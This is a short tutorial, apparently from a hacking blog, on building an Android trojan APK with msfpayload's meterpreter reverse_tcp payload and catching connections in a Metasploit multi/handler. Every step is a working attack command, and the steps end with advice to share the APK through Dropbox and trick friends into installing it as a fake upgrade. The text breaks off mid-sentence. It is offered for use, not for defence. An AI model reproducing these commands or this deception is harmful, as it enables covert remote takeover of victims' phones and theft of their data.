Procedure 1:Open the terminal
- To make an apk ex:theinnews.apk
- It can be created by using the command :
- msfpayload android/meterpreter/reverse_tcp LHOST=192.168.0.4 R > /root/theinnews.apk(replace LHOST with our own IP)
- We can also hack android on WAN i.e. through Interetby using our Public/External IP in the LHOST and by port forwarding
Procedure 2:Open Another Terminal:
- Open another terminal till the file gets produced.
- Load the metasploit console, by using the command the following command : msfconsole
Procedure 3:Set-Up a Apk:
- After it loads(it might take some time), load the multi-handler exploit by using the command : use exploit/multi/handler
- Set up a (reverse) payload by using the command : set payload android/meterpreter/reverse_tcp
- To set L host type : set LHOST 192.168.0.4(Even if we are hacking on WAN type our private/internal IP here not the public/external)
Procedure 4: Exploit!
- At last type: exploit to start the apk.
- Copy the application that we made (Theinnews.apk) from the root folder, to we android phone.
- Then share it using the shareup sites Uploading it to Dropbox or any sharing website.
- Then send the link that the Website gave we to our friends and exploit their phones (Only on LAN, but if we used the WAN method then we can use the exploit anywhere on the INTERNET)
- Let the Victim install the Theinnews.apk app(as he would think it is meant to upgrade some features on his phone)
- However, the option of allowance for Installation of apps from Unknown Sources should be enabled (if not) from the security settings of the android phone to allow the Trojan to install.
- And when he clicks Open…
